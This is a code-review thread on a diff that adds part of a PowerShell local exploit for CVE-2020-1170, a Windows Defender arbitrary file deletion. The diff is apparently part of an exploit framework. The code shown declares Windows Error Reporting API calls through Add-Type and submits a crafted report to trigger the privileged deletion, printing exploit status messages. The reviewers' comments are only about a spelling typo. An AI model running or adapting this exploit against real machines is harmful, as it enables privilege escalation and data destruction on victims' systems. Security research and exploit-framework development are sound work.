data/exploits/CVE-2020-1170/DefenderArbitraryFileDelete.ps1

```diff
@@ -0,0 +1,217 @@
+
+            Start-Sleep -Seconds 5
+        }
+
+        if ($BaitNtFile) {
+            $BaitNtFile.Close()
+        }
+
+    } else {
+        Write-Host "[-] Failed to create directory '$($MpCmdRunBakFolderPath)'" -ForegroundColor Red
+    }
+
+    if ($Success) {
+        $ElapsedTime = New-TimeSpan -Start $StartDate -End $(Get-Date)
+        #
+        # Calls to WER based on the Add-Type Win32 API calling method described at
+        # https://devblogs.microsoft.com/scripting/use-powershell-to-interact-with-the-windows-api-part-1/
+        #
+        # Type definitions taken in part from MSDN documentation as well as from
+        # http://www.pinvoke.net/default.aspx/wer.WerReportSubmit and http://www.pinvoke.net/default.aspx/wer.WerReportCreate
+        #
+        $MethodDefinition = @'
+        public enum WER_REPORT_TYPE
+         {
+         WerReportNonCritical,
+         WerReportCritical,
+         WerReportApplicationCrash,
+         WerReportApplicationHange,
+         WerReportKernel,
+         WerReportInvalid
+         }
+
+        public enum WER_CONSENT
+         {
+         WerConsentAlwaysPrompt = 4,
+         WerConsentApproved = 2,
+         WerConsentDenied = 3,
+         WerConsentMax = 5,
+         WerConsentNotAsked = 1
+         }
+
+        [DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+        public extern static int WerReportCreate(string pwzEventType, WER_REPORT_TYPE repType, IntPtr pReportInformation, ref IntPtr phReportHandle);
+        [DllImport("wer.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+        public extern static int WerReportSubmit(IntPtr hReportHandle, int consent, int dwFlags, ref IntPtr pSubmitResult);
+'@
+
+        Add-Type -MemberDefinition $MethodDefinition -Name 'WER' -Namespace 'Win32' -PassThru
+        $handle = 0 # Need to create the variable for the ref, so lets add this in so long.
+        if( ([Win32.WER]::WerReportCreate("A",[Win32.WER+WER_REPORT_TYPE]::WerReportNonCritical, 0, [ref] $handle)) -ne 0 ){ # 0 in third argument is for blank pReportInformation
+            Write-Host "[-] Exploit failed. Couldn't create the report" -ForegroundColor Red
+        }
+        $result = 999 # Need to create the variable for the ref, so set it to a random value of 999.
+        if( [Win32.WER]::WerReportSubmit($handle, 1, 164, [ref]$result) -ne 0){ # 1 = WerConsentNotAsked, 36 = WER_SUBMIT_QUEUE | WER_SUBMIT_OUTOFPROCESS | WER_SUBMIT_ARCHIVE_PARAMETERS_ONLY
+            Write-Host "[-] Exploit failed. Couldn't submit the report" -ForegroundColor Red
+        }
+
+        if ($result -ne 1){
+            Write-Host "[-] Exploit failed. Report wasn't queued" -ForegroundColor Red
+        }
+
+        Write-Host "[+] Exploit successfull! Elapsed time: $($ElapsedTime.ToString())." -ForegroundColor Green

```

Comment:
```suggestion
        Write-Host "[+] Exploit successful! Elapsed time: $($ElapsedTime.ToString())." -ForegroundColor Green

```

:P

Reply:
*see no evil*

Reply:
Fixed with next commit.

Reply:
You should PR the typo fix on itm4n's repo. I hear that's what the cool kids do.